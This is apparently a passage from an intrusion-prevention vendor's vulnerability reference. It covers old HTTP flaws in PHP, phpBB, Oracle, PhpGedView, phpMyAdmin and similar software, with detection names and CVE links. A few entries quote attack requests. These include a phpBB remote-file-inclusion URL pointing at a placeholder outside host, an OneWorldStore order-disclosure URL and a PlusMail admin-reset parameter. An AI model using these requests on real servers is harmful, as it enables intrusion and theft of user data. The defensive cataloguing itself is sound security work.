https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1637
BID-13649
http://www.securityfocus.com/bid/13649
Back to top

HTTP-Nph-Test-Cgi-File-Disclosure

About this vulnerability: nph-test-cgi allows remote users to view the filesystem
Risk: Low
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: nph-test-cgi
Type: Malfunction
Description: A test script distributed with many http daemons, nph-test-cgi, does not sufficiently validate input. A remote attacker can view the server's filesystem by passing a suitable argument to the nph-test-cgi.
References:
CVE-1999-0045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0045
BID-686
http://www.securityfocus.com/bid/686
Back to top

HTTP-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Winamp
Risk: High
First detected in: sgpkg-ips-84-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Winamp
Type: Buffer Overflow
Description: Winamp has a heap-based buffer overflow vulnerability. A target user that has a vulnerable version of the affected product installed can be persuaded to follow a link with a prefix 'uvox://' to a malicious server that returns an HTTP response with an excessively large value in Ultravox-Max-Msg header field. This leads to a DoS terminating the affected product, or code execution with the privileges of the currently logged in user.
Situation: HTTP_SHS-Nullsoft-Winamp-Ultravox-Ultravox-Max-Msg-Header-Buffer-Overflow
References:
CVE-2006-5567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5567
BID-20744
http://www.securityfocus.com/bid/20744
OSVDB-30051
http://www.osvdb.org/30051
Back to top

HTTP-Omnicron-OmniHTTPD-visadmin.exe-Resource-Starvation

About this vulnerability: visadmin.exe can be exploited to fill hard disk.
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Omnicron OmniHTTPD
Type: Malfunction
Description: A cgi application visadmin.exe, installed by default within Omnicron OmniHTTPD, can be exploited to create a temporary file which fills hard disk. This can cause a denial of service until the file is deleted.
References:
CVE-1999-0970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0970
BID-1808
http://www.securityfocus.com/bid/1808
Back to top

HTTP-OmniWeb-JavaScript-Alert-Format-String-Vulnerability

About this vulnerability: A format string vulnerability in OmniWeb
Risk: Moderate
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1555-5242
Platform: Mac OS X
Software: OmniWeb
Type: Format String
Description: There is a format string vulnerability in OmniWeb. Malicious javascript code on a web page may be used to execute code in the context of the current user, leading to system compromise.
Situation: HTTP_OmniWeb-JavaScript-Alert-Format-String-Vulnerability
References:
CVE-2007-0148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0148
BID-21911
http://www.securityfocus.com/bid/21911
OSVDB-31222
http://www.osvdb.org/31222
Back to top

HTTP-Oneworldstore-Owofflinecc-Information-Disclosure

About this vulnerability: Oneworldstore user information disclosure vulnerability
Risk: Low
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OneWorldStore
Type: Malfunction
Description: OneWorldStore shopping cart application suffers from an information disclosure vulnerability. Requests such as "http://[victim]/owBasket/PaymentMethods/owOfflineCC.asp?idOrder=1" will result to the disclosure of the buyers' names and addresses.
Situation: HTTP_CSU-Oneworldstore-Owofflinecc-Information-Disclosure
References:
CVE-2005-1329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1329
BID-13361
http://www.securityfocus.com/bid/13361
OSVDB-15781
http://www.osvdb.org/15781
Back to top

HTTP-Oracle-Bea-WebLogic-Transfer-Encoding-BOF

About this vulnerability: Buffer Overflow vulnerability in Oracle Bea WebLogic
Risk: High
First detected in: sgpkg-ips-180-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle BEA WebLogic
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in BEA WebLogic Server Apache Connector. The vulnerability is due to a boundary error in the Apache connector. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the target host. Successful exploitation would allow the attacker to executearbitrary code on the vulnerable system with privileges of the running process, normally system.
Situation: HTTP_CSH-Transfer-Encoding-Invalid
HTTP_CSH-Transfer-Encoding-Overflow
References:
CVE-2008-4008
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4008
BID-31683
http://www.securityfocus.com/bid/31683
Back to top

HTTP-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution

About this vulnerability: A memory corruption vulnerability in Oracle ORADC ActiveX control
Risk: High
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle 8i; Oracle 9i; Oracle 10g
Type: Input Validation
Description: There is a memory corruption vulnerability in Oracle ORADC ActiveX control included in Oracle Database Server. A call lacking the proper initialization to a specific method of the control can be used to corrupt the heap. This may lead to code execution or denial of service.
Situation: HTTP_SS-Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
File-Text_Oracle-Data-Control-ORADC-ActiveX-Control-Code-Execution
References:
BID-22026
http://www.securityfocus.com/bid/22026
Back to top

HTTP-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting

About this vulnerability: XSS vulnerabilities in Oracle HTTP Server isqlplus component
Risk: Low
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle HTTP Server
Type: Cross-site Scripting
Description: Oracle HTTP Server 1.3.22 suffers from XSS vulnerabilities in its isqlplus component. Crafted requests containing script code to isqlplus parameters action, username, or password may allow cross-site scripting attacks.
Situation: HTTP_CRL-Oracle-HTTP-Server-Isqlplus-Cross-Site-Scripting
References:
CVE-2004-2115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2115
BID-9484
http://www.securityfocus.com/bid/9484
Back to top

HTTP-Oracle-Suspected-Probe

About this vulnerability: Suspected vulnerability probe of Oracle 8/9i
Risk: Moderate
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i; Oracle 9i
Type: Insecure Configuration
Description: A remote user has been detected accessing potentially vulnerable end-points on an Oracle server.
Situation: HTTP_CSU-Oracle-Potential-Vulnerability-Probe-Request
Back to top

HTTP-Oracle-XSQLConfig.xml-Information-Disclosure-Vulnerability

About this vulnerability: Information disclosure in Oracle 8i/9i
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 8i; Oracle 9i
Type: Insecure Configuration
Description: Due to insecure default configuration, any remote user is able to request configuration files "XSQLConfig.xml" and "soapConfig.xml". Those files contain sensitive information, such as database usernames and passwords.
Situation: HTTP_CSU-Oracle-XSQLConfig.xml-Information-Disclosure
References:
CVE-2002-0568
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0568
BID-4290
http://www.securityfocus.com/bid/4290
Back to top

HTTP-Oracle9i-Source-Code-Disclosure-Vulnerability

About this vulnerability: Source code disclosure in Oracle 9i
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i
Type: Malfunction
Description: Due to a design error in the Oracle 9i application server, any remote user is able to request the source code of a jsp page. Globals.jsa is also accessible with the same method.
Situation: HTTP_CSU-Oracle9i-Source-Code-Disclosure
References:
CVE-2002-0562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0562
BID-4034
http://www.securityfocus.com/bid/4034
Back to top

HTTP-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Orbit Downloader
Risk: Moderate
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: Orbit Downloader
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Orbit Downloader. Successful exploitation allows non-privileged arbitrary code execution on a vulnerable host.
Situation: HTTP_SS-Orbit-Downloader-Url-Processing-Stack-Buffer-Overflow
References:
CVE-2008-1602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1602
BID-28541
http://www.securityfocus.com/bid/28541
OSVDB-44036
http://www.osvdb.org/44036
Back to top

HTTP-osCommerce-Response-Splitting

About this vulnerability: Response splitting vulnerability in osCommerce
Risk: Moderate
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: osCommerce
Type: Input Validation
Description: osCommerce has multiple HTTP response splitting vulnerabilities. The application fails to parse properly user supplied input given to 'products_id' or 'pid' parameters in index.php. Remote attackers can exploit these vulnerabilities to spoof web content and poison web caches.
Situation: HTTP_CSU-osCommerce-Response-Splitting
References:
CVE-2005-1951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951
BID-13979
http://www.securityfocus.com/bid/13979
OSVDB-17284
http://www.osvdb.org/17284
Back to top

HTTP-Pafiledb-Session-Authentication-Information-Disclosure

About this vulnerability: paFileDB shows users' password hashes
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: paFileDB
Type: Malfunction
Description: When paFileDB is used with session authentication, user names and password hashes are stored in a file readable by anyone. Remote attackers can access the directory where session files are stored and view information about all logged-in users.
References:
CVE-2004-1219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1219
BID-11818
http://www.securityfocus.com/bid/11818
Back to top

HTTP-Panews-MySQL-Prefix-SQL-Injection

About this vulnerability: PaNews arbitrary SQL injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: paNews
Type: SQL Injection
Description: PaNews has an SQL injection vulnerability in the handling of the 'mysql_prefix' parameter. The script allows remote attackers to execute arbitrary SQL queries into the underlying database by sending crafted HTTP requests.
Situation: HTTP_CRL-Panews-MySQL-Prefix-SQL-Injection
References:
CVE-2005-0646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0646
BID-12687
http://www.securityfocus.com/bid/12687
Back to top

HTTP-Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Panic Transmit FTP client
Risk: Moderate
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: Panic Trasmit
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Panic Transmit FTP client. A malicious, crafted web page may be used to execute code in the context of the current user, leading to system compromise.
Situation: HTTP_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
File-Text_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
References:
CVE-2007-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0020
BID-22145
http://www.securityfocus.com/bid/22145
OSVDB-32694
http://www.osvdb.org/32694
Back to top

HTTP-Performer-Pfdispaly-Cgi-File-Disclosure

About this vulnerability: pfdispaly.cgi allows reading of arbitrary files
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: IRIX
Software: IRIX Performer API Search Tool
Type: Metacharacter Injection
Description: A flaw in pfdispaly.cgi in the IRIX Performer API Search Tool allows remote users to view arbitrary files from the host.
References:
CVE-1999-0270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0270
BID-64
http://www.securityfocus.com/bid/64
OSVDB-134
http://www.osvdb.org/134
Back to top

HTTP-Phf-Cgi-Command-Execution-Vulnerability

About this vulnerability: Command execution vulnerability in phf script
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache; NCSA HTTPd
Type: Metacharacter Injection
Description: A example CGI script, phf, allows remote attackers to execute arbitrary commands on the server. This is possible due to insufficient validation of user input in a library function escape_shell_cmd() found on older Apache and NCSA web servers.
Situation: HTTP_CRL-Phf-Cgi-Command-Execution
References:
CVE-1999-0067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0067
BID-629
http://www.securityfocus.com/bid/629
OSVDB-136
http://www.osvdb.org/136
Back to top

HTTP-Phorum-Multiple-Php-Cross-Site

About this vulnerability: Multiple php files in Phorum vulnerable to cross-site scripting
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Phorum
Type: Malfunction
Description: Multiple php scripts in Phorum version 3.4.5 and earlier are vulnerable to cross-site scripting. Arguments to Common.php, Profile.php's "EditError" variable and login.php's "Error" variable are not sanitized properly, allowing remote attackers to execute cross-site scripting attacks.
References:
CVE-2004-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0034
BID-9361
http://www.securityfocus.com/bid/9361
OSVDB-3510
http://www.osvdb.org/3510
OSVDB-3506
http://www.osvdb.org/3506
OSVDB-3434
http://www.osvdb.org/3434
Back to top

HTTP-Phorum-Register-Php-SQL-Injection

About this vulnerability: Phorum's register.php allows SQL injection
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Phorum
Type: SQL Injection
Description: Phorum's register.php has an SQL injection vulnerability, which allows remote attackers to execute SQL commands inside the script by passing suitable arguments to the "hide_email" field.
Situation: HTTP_CRL-Phorum-Register-Php-SQL-Injection
References:
CVE-2004-0035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0035
BID-9361
http://www.securityfocus.com/bid/9361
OSVDB-3508
http://www.osvdb.org/3508
Back to top

HTTP-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS

About this vulnerability: Buffer overflow vulnerabilities in the PhotoStockPlus Uploader Tool ActiveX control
Risk: High
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PhotoStockPlus Uploader Tool
Type: Buffer Overflow
Description: There are buffer overflow vulnerabilities in the PhotoStockPlus Uploader Tool ActiveX control. By assigning an excessively long string to the Username or Password property via a crafted web site, a remote attacker can execute non-privileged arbitrary code on a vulnerable host.
Situation: HTTP_SS-PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
File-Text_PhotoStockPlus-Uploader-Tool-ActiveX-Control-Username-Password-BOFS
References:
CVE-2008-0957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0957
BID-29279
http://www.securityfocus.com/bid/29279
OSVDB-45374
http://www.osvdb.org/45374
Back to top

HTTP-Php-Cgi-BOF

About this vulnerability: Buffer overflow in PHP cgi program php.cgi
Risk: Moderate
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Buffer Overflow
Description: Buffer overflow in PHP cgi program php.cgi, successful exploit allows shell access.
Situation: HTTP_CSU-Php.cgi-Access
References:
CVE-1999-0058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0058
BID-712
http://www.securityfocus.com/bid/712
Back to top

HTTP-Php-Cgi-File-Disclosure

About this vulnerability: File disclosure vulnerability in php.cgi
Risk: Moderate
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: Php.cgi allows attackers to read any file on the system.
Situation: HTTP_CSU-Php.cgi-Possible-File-Disclosure
References:
CVE-1999-0238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0238
BID-2250
http://www.securityfocus.com/bid/2250
Back to top

HTTP-Php-Crlf-Fake-Header-Injection

About this vulnerability: Fake HTTP header injection vulnerability
Risk: High
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: A vulnerability exists in PHP that allows an attacker to use a remote PHP script as a proxy or open mail relay, possibly bypassing firewall access controls.
Situation: HTTP_CRL-Php-Crlf-Header-Injection-Proxing-Attack
References:
CVE-2002-1783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783
BID-5681
http://www.securityfocus.com/bid/5681
Back to top

HTTP-Php-Error-Logging-Format-Strigs-Vulnerability

About this vulnerability: Php Error Logging Format String Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Unix
Software: PHP
Type: Format String
Description: Php Error logging contains a vulnerability which, if error logging is enabled, can be exploited to gain full control of the victim host.
Situation: HTTP_CS-Php-Error-Loggin-Format-Strings-Vuln
HTTP_CS-Php-Error-Logging-Format-Strings-Vuln-2
HTTP_CS-Php-Error-Logging-Format-String-Vuln-3
HTTP_CSU-Php-Error-Loggin-Format-Strigs-Vuln-Strengur
References:
CVE-2000-0967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0967
BID-1786
http://www.securityfocus.com/bid/1786
Back to top

HTTP-Php-Escapeshellcmd-Command-Execution

About this vulnerability: Vulnerability in escapeshellcmd function allows remote execution
Risk: High
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PHP
Type: Input Validation
Description: A security flaw exists in certain versions of the PHP interpreter on Windows platforms. The flaw is in escapeshellcmd function, and if exploited successfully, the vulnerability allows remote command execution
Situation: HTTP_CRL-Php-Shell-Escape-Functions-Command-Execution
References:
CVE-2004-0542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0542
BID-10471
http://www.securityfocus.com/bid/10471
OSVDB-6710
http://www.osvdb.org/6710
Back to top

HTTP-Php-Function-Header-Injection

About this vulnerability: PHP allows injection of HTTP headers with certain functions
Risk: Low
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Input Validation
Description: Certain functions of PHP language do not validate input sufficiently, allowing HTTP header injection.
Situation: HTTP_CSU-Php-Function-Header-Injection
References:
CVE-2002-1783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783
BID-5681
http://www.securityfocus.com/bid/5681
Back to top

HTTP-Php-Fusion-Database-Backup-Disclosure

About this vulnerability: Database backup file disclosure vulnerability in PHP-Fusion
Risk: Moderate
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP-Fusion
Type: Insecure Configuration
Description: The instructions of PHP-Fusion 4.0 advise users to set the permissions on the database backups directory to world read/write/execute. A remote attacker can download or view database backups, which have easily guessable filenames. From these backups, the attacker can find out the administrator username and password.
Situation: HTTP_CSU-Php-Fusion-Database-Backup-Disclosure
References:
CVE-2004-1724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1724
BID-10974
http://www.securityfocus.com/bid/10974
Back to top

HTTP-Php-Globals-Parameter-Usage

About this vulnerability: PHP GLOBALS parameter usage
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: PHP has a group of variable arrays called superglobals, which are accessible from all functions and methods. One of the superglobals, $GLOBALS, is a reference to the global symbol table. In certain versions of PHP, the $GLOBALS array can be modified via HTTP requests. This allows attackers to influence the execution of a server side script by initializing global variables used by the script to arbitrary values. Depending on the server side script different outcomes may be achieved by utilizing this vulnerability, including arbitrary PHP code execution on the server.
Situation: HTTP_CS-Php-Globals-Parameter-Usage
Back to top

HTTP-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability

About this vulnerability: Multipart HTTP POST request can be used to overwrite PHP GLOBALS array
Risk: Moderate
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Malfunction
Description: Certain versions of PHP suffer from a vulnerability where an HTTP POST request can be used to modify the GLOBALS array when register_globals is enabled. This PHP vulnerability allows remote attackers to further exploit other vulnerabilities in PHP scripts.
Situation: HTTP_CS-Php-Multipart-POST-Request-Globals-Array-Modification-Vulnerability
References:
CVE-2005-3390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3390
BID-15250
http://www.securityfocus.com/bid/15250
Back to top

HTTP-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise

About this vulnerability: PHP-Nuke command execution vulnerability via admin_styles.php phpbb_root_path parameter
Risk: High
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP-Nuke
Type: Malfunction
Description: 7.x versions of PHP-Nuke allow arbitrary php files to be included via the phpbb_root_path parameter in admin_styles.php. The vulnerability allows remote attackers to execute arbitrary PHP code on the host running a vulnerable version of the software.
Situation: HTTP_CSU-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise
References:
CVE-2006-2828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828
Back to top

HTTP-Php-Phpinfo-XSS

About this vulnerability: Phpinfo Cross-Site Scripting vulnerability
Risk: Low
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PHP
Type: Cross-site Scripting
Description: A vulnerability exists in PHP that allows an remote attacker to implement Cross-site Scripting attacks in the target server running vulnerable PHP software
Situation: HTTP_CS-Php-Phpinfo-XSS-Post
HTTP_CSU-Php-Phpinfo-XSS-Get
HTTP_CSH-Possible-Script-In-Header
HTTP_CRL-Script-In-Request
HTTP_CRL-Script-In-Get-Request
HTTP_CRL-Possible-Script-In-Get-Request
HTTP_CRL-Possible-Script-In-Request
Back to top

HTTP-Phpbb-Admin-Cash-Php-System-Compromise

About this vulnerability: PhpBB allows remote users to execute arbitrary php
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PhpBB
Type: Malfunction
Description: PhpBB's admin_cash.php allows remote users to execute arbitrary php code. Admin_cash.php includes the file phpbb_root_path/includes/functions_selects.php, and the phpbb_root_path can be set to point to an arbitrary location with a request like "http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w"
Situation: HTTP_CS-Phpbb-Admin-Cash-Php-System-Compromise
References:
CVE-2004-1535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1535
BID-11701
http://www.securityfocus.com/bid/11701
Back to top

HTTP-Phpbb-Viewtopic-Urldecode-System-Compromise

About this vulnerability: PhpBB allows remote attackers to execute arbitrary commands
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PhpBB
Type: Malfunction
Description: PhpBB's view_topic.php fails to remove critical characters from its input, allowing remote attackers to execute arbitrary commands with a specially-crafted HTTP request.
Situation: HTTP_CRL-Phpbb-Viewtopic-Urldecode-System-Compromise
References:
BID-11672
http://www.securityfocus.com/bid/11672
Back to top

HTTP-PhpDig-Config-Php-System-Compromise

About this vulnerability: PhpDig config.php allows arbitrary PHP code execution
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PhpDig
Type: Malfunction
Description: PhpDig's config.php includes scripts from $relative_script_path/. This allows remote attackers to execute arbitrary PHP code on the host by setting the relative_script_path parameter to point to a URL that contains the file locales/en-language.php.
Situation: HTTP_CRL-PhpDig-Config-Php-System-Compromise
References:
CVE-2004-0068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068
BID-9424
http://www.securityfocus.com/bid/9424
Back to top

HTTP-PhpGedView-Admin-Php-Information-Disclosure

About this vulnerability: Admin.php of PHPGedview can disclose sensitive information about the host
Risk: Low
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: PhpGedView
Type: Malfunction
Description: Admin.php of PHPGedview allows remote users to access information displayed by the phpinfo() function. This can disclose sensitive information about the host.
References:
CVE-2004-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0033
BID-9371
http://www.securityfocus.com/bid/9371
OSVDB-3404
http://www.osvdb.org/3404
Back to top

HTTP-PhpGedView-Change-Admin-Password

About this vulnerability: Possibility to change admin password in PhpGedView
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1637-5242
Platform: Unix
Software: PhpGedView
Type: Malfunction
Description: PhpGedView versions 2.61 and earlier allow remote attackers to re-install editconfig.php to change the administrator password, leading to unauthorized access of application data.
References:
CVE-2004-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0031
OSVDB-3403
http://www.osvdb.org/3403
Back to top

HTTP-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal

About this vulnerability: PhpGedView's editconfig_gedcom.php contains a directory traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PhpGedView
Type: Directory Traversal
Description: PhpGedView allows remote attackers to execute arbitrary PHP scripts or view arbitrary files by adding directory traversal sequences (../) into editconfig_gedcom.php's gedcom_config parameter.
Situation: HTTP_CS-PhpGedView-Editconfig-Gedcom-Php-Directory-Traversal
References:
CVE-2004-0127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127
BID-9529
http://www.securityfocus.com/bid/9529
OSVDB-3768
http://www.osvdb.org/3768
Back to top

HTTP-PhpGedView-Login-Path-Disclosure

About this vulnerability: Phpgedview displays full path in an error message
Risk: Low
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PhpGedView
Type: Malfunction
Description: PhpGedView displays the full path in an error message when login.php is requested without the required username and password parameters. The vulnerability allows remote attackers to obtain sentivive information about the system.
Situation: HTTP_CS-PhpGedView-Login-Path-Disclosure
References:
CVE-2004-0130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0130
OSVDB-6886
http://www.osvdb.org/6886
Back to top

HTTP-PhpGedView-Search-Firstname-Cross-Site

About this vulnerability: Arbitrary HTML/script code injection via firstname parameter in phpgedview/search.php
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: PhpGedView
Type: Malfunction
Description: A cross-site scripting vulnerability exists in PhpGedView's search.php, allowing remote attackers to include arbitrary HTML or script code into the script's "firstname" parameter. This allows attackers to create links that will execute the attacker's code in the security context of the host site if the links are followed by the users.
References:
CVE-2004-0032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0032
BID-9369
http://www.securityfocus.com/bid/9369
OSVDB-3402
http://www.osvdb.org/3402
Back to top

HTTP-Phpmyadmin-Export-Php-Directory-Traversal

About this vulnerability: PhpMyAdmin has a directory traversal vulnerability in export.php
Risk: Low
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Directory Traversal
Description: PhpMyAdmin's export.php does not parse directory traversal sequences (../) from the what - parameter This allows remote attackers to view arbitrary files from the server.
Situation: HTTP_CSU-Phpmyadmin-Export-Php-Directory-Traversal
References:
CVE-2004-0129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0129
BID-9564
http://www.securityfocus.com/bid/9564
OSVDB-3800
http://www.osvdb.org/3800
Back to top

HTTP-Phpmyadmin-Grab-Globals-Lib-File-Disclosure

About this vulnerability: PHPMyAdmin allows remote attackers to view files from the server
Risk: Moderate
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: phpMyAdmin
Type: Malfunction
Description: PhpMyAdmin 2.6.4-pl1 has a file disclosure vulnerability. By sending a specially-crafted HTTP request to grab_globals.lib.php, a remote attacker may read files from the host that are accessible by the web server.
Situation: HTTP_CRL-Phpmyadmin-Grab-Globals-Lib-File-Disclosure
References:
BID-15053
http://www.securityfocus.com/bid/15053
Back to top

HTTP-Plusmail-Cmd-Exec

About this vulnerability: Command execution via plusmail CGI script
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PowerScripts PlusMail WebConsole
Type: Malfunction
Description: A remote attacker can change the administrative username and password of PowerScripts PlusMail Web Control Panel without knowing the current one. This is possible by passing the argument "new_login" with a value "reset password" to the /cgi-bin/plusmail script. After that the attacker can execute various privileged tasks, including changing the mailing lists, e-mail aliases, and editing the Web site.
Situation: HTTP_CRL-Plusmail-New-Login-Attempt
References:
CVE-2000-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0074
BID-2653
http://www.securityfocus.com/bid/2653
Back to top

HTTP-Possible-Cross-Site-Scripting

About this vulnerability: HTTP Possible Cross Site Scripting
Risk: Moderate
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Cross-site Scripting
Description: Several web applications are vulnerable to cross site scripting (XSS) attacks.
Situation: HTTP_CSU-Script-Tag-In-URI
HTTP_CSH-Suspected-Cross-Site-Scripting-Attempt
HTTP_CRL-Possible-Cross-Site-Scripting-Attempt
HTTP_CRL-Possible-Cross-Site-Scripting-Attempt-2
HTTP_CRL-Possible-Cross-Site-Scripting-With-JavaScript
HTTP_CRL-Possible-Cross-Site-Scripting-With-Onmouseover
HTTP_CRL-Possible-Cross-Site-Scripting-With-Body-Onload
HTTP_CRL-Script-In-Request
HTTP_CRL-Script-In-Get-Request
HTTP_CRL-Possible-Script-In-Get-Request
HTTP_CRL-Possible-Script-In-Request
Back to top

HTTP-Publishing-Xpert-Err-Page-Path-File-Disclosure

About this vulnerability: Publishing Xpert errPagePath File Disclosure
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Solaris
Software: Netscape PublishingXpert
Type: Directory Traversal
